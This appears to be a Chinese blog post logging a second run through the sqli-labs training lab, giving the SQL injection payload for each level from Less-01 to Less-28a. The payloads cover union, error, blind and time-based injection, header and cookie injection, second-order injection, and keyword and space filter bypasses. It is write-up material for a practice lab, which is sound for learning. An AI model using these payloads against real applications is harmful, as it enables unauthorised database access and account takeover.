二刷sqlilabs通关记录-持续记录

Less-01

payload为-1' union select 1,2,database()%23

Less-02

payload为-1 union select 1,2,database()

Less-03

payload为-1') union select 1,2,database()%23

Less-04

payload为-1") union select 1,2,database()%23

Less-05

payload为1' and updatexml(1,concat(0x7e,database(),0x7e),1)%23

Less-06

payload为1" and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23

Less-07

payload为-1')) union select 1,3,database() into outfile 'C:/7.txt' %23，两个))太骚了。

Less-08

payload为1' and database()='security

Less-09

payload为1' and sleep(5)%23

Less-10

payload为1" and sleep(5)%23

扫描二维码关注公众号，回复： 11035795 查看本文章

Less-11

payload为post提交的数据：

uname=' or updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=2&submit=Submit

Less-12

payload为post提交的数据：

uname=") or updatexml(1,concat(0x7e,(select database()),0x7e),1)#&passwd=2&submit=Submit

Less-13

payload为post提交的数据：

uname=') or (select * from (select concat_ws("^",database(),floor(rand(0)*2))x,count(*) from information_schema.tables group by x) as y) #&passwd=2&submit=Submit

Less-14

payload为post提交的数据：

uname=" or (select * from (select concat_ws("^",database(),floor(rand(0)*2))x,count(*) from information_schema.tables group by x) as y) #&passwd=2&submit=Submit

Less-15

payload为post提交的数据：

uname=admin' and database()='security&passwd=admin&submit=Submit

Less-16

payload为post提交的数据：

uname=admin") and database()=("security&passwd=admin&submit=Submit

Less-17

payload为post提交的数据：

uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&submit=Submit

Less-18

payload为post数据，但是注入点却在ua上

2222',2,updatexml(1,concat(0x7e,(select database()),0x7e),1))#

Less-19

payload为post数据，但是注入点却在referer上

1' and extractvalue(0x11,concat(0x5e,database(),0x5e)),'1')# //这里无法使用updatexml()???

Less-20

先使用用户进行登陆，然后直接改ccokie，payload为
uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#

Less-21

和Less-20基本一致，cookie使用了base64编码，payload为
YWRtaW4nIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIGFuZCAnMQ==

Less-22

和Less-21基本一致，使用了双引号闭合，payload为
YWRtaW4iIGFuZCB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpLDB4N2UpLDEpIw0%3d

Less-23

过滤了注释符，#和--两种方法，直接采用闭合的方式来完成突破。
1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1

Less-24

二次注入，申请admin'#的账户，然后使用admin'#去进行更改密码，其实改的密码是admin的，直接拿到admin的权限。

Less-25

过滤了关键字and和or，使用双写绕过。
1' Aandnd 1=2%23

Less-25a

判断注入点的方式使用2-1和2-0，其余和上一关一样
2 Aandnd 1=2

Less-26

过滤了and,or,#,--,space，单引号闭合
1'%0aaandnd%0a'1'='2

Less-26a

闭合方式有变化，而且连续过滤两次空格后%0a换行符无法使用。
1')%0baandnd%0b1=('2

Less-27

过滤了union和select，特别是select的正则多了m修饰符，需要三写绕过（和一刷时不一样）
1000'%0auunionnion%0aseseleselectctlect%0a1,database(),'3

Less-27a

单引号变双引号闭合
1000"%0Auunionnion%0Aseseleselectctlect%0A1,database(),"3

Less-28

题目说是报错注入，但是源码中将error信息关掉了。。。
1')%0aand%0a(updatexml(1,concat(0x5e,database(),0x5e),1))=('1

Less-28a

去掉其他的过滤，只留下了union select。
1')%0aand%0aif(length(database())>0,sleep(3),1)%23